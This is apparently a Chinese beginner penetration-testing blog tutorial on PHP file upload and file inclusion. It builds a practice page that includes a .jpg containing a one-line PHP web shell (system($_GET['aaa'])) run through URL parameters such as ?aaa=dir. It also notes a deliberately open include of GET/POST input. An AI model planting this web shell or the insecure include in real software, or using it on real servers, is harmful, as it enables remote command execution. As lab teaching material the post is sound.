渗透测试入门学习——php文件上传与文件包含

最终效果:
提前在网站根目录创建upload目录:
主页面(文件名为file.php):
php 复制代码
<html>
<head>
    <meta charset="utf-8">
    <title>php文件相关练习</title>
</head>

<h1>php文件相关练习</h1>

<hr>
<?php
    //文件包含include或者require
    require 'content_1.txt';
    echo $content_test;
?>

<hr>
<?php
    echo "jpg文件包含一句话木马",'<br>';
    echo "产生空值报错为正常,url中传入?aaa=dir或是=ipconfig即可getshell",'<br>';
    require 'content_2.jpg'
    //文件包含存在漏洞,可上传jpg文件或是其他文件然后用包含漏洞打开执行
    //文件包含的另一种形式,包含POST或GET传入文件
    //include $_GET['file1'];
    //require $_POST['file2'];
?>

<hr>
<form action="#" method="post" enctype="multipart/form-data">
        <label for="file">文件名:
        <input type="file" name="file" id="file">
        <input type="submit" name="submint" value="提交">
</form>

<?php
    $allow_list = array("gif", "jpeg", "jpg", "png");           //上传文件后缀(类型)白名单
    $file_name = explode(".",$_FILES["file"]["name"]);          //explode()函数,将字符串以第一个参数"."为标志分隔开成为数组
    $file_type = end($file_name);                               //获取数组最后的元素,确保为最后的元素以免出现识别test.php.jpg这样的文件时出现文件后缀识别错误的bug
    if((($_FILES["file"]["type"] == "image/gif")                //初步判断上传的文件是不是图片类型
    || ($_FILES["file"]["type"] == "image/jpeg")                //六种常见的文件类型
    || ($_FILES["file"]["type"] == "image/jpg")
    || ($_FILES["file"]["type"] == "image/pjpeg")
    || ($_FILES["file"]["type"] == "image/x-png")
    || ($_FILES["file"]["type"] == "image/png"))
    && ($_FILES["file"]["size"] <= 204800)                      //大小不超过200kb
    && in_array($file_type, $allow_list)){                      //文件后缀(类型)需要在白名单中
        echo "格式正确".'<br>';

        if($_FILES["file"]["error"] > 0){
            echo "传输失败";
        }
        else{
            echo "文件名".$_FILES["file"]["name"]."<br>";
            echo "文件类型".$_FILES["file"]["type"]."<br>";
            echo "文件大小".$_FILES["file"]["size"]."<br>";
            echo "文件临时位置".$_FILES["file"]["tmp_name"]."<br>";
            echo "传输成功<br>";
            if(file_exists("upload/".$_FILES["file"]["name"])){//判断upload是否存在上传的文件
                echo $_FILES["file"]["name"]."文件已存在";
            }else{
                move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);//将上传的文件移动到新位置
                echo "文件已经存储在:"."upload/".$_FILES["file"]["name"];
            }
        }

    }else{
        if(empty($_FILES)){
            echo "还未上传任何文件";
        }
        else {
            echo "非法的文件格式";
        }
    }
?>
</html>
被包含的txt文件(文件名为content_1.txt):
php 复制代码
<?php
    $content_test = 555;
?>
被包含的jpg文件(文件名为content_2.jpg):

命名为content_2.php编辑好后再将后缀改为.jpg,内容为一句话木马

php 复制代码
<?php
    system($_GET['aaa']);
?>
相关推荐
黎宇幻生1 小时前
Java全栈学习笔记39
java·笔记·学习
jiangzhihao05152 小时前
前端自动翻译插件webpack-auto-i18n-plugin的使用
前端·webpack·node.js
胡耀超2 小时前
隐私计算技术全景:从联邦学习到可信执行环境的实战指南—数据安全——隐私计算 联邦学习 多方安全计算 可信执行环境 差分隐私
人工智能·安全·数据安全·tee·联邦学习·差分隐私·隐私计算
csdn_aspnet3 小时前
PHP 求圆柱体的周长(Find the perimeter of a cylinder)
php
诸葛悠闲4 小时前
XCP协议在以太网上实现的配置
学习
软件技术NINI4 小时前
html css网页制作成品——HTML+CSS盐津铺子网页设计(5页)附源码
前端·css·html
Kiri霧4 小时前
Rust开发环境搭建
开发语言·后端·rust
旺仔Sec5 小时前
新疆维吾尔自治区第一届“丝路杯”网络安全大赛暨2026年新疆职业院校技能大赛网络安全赛项竞赛样题
安全·web安全
mapbar_front5 小时前
面试问题—我的问题问完了,你还有什么想问我的吗?
前端·面试
我不是QI5 小时前
DES 加密算法:核心组件、加解密流程与安全特性
经验分享·算法·安全·网络安全·密码学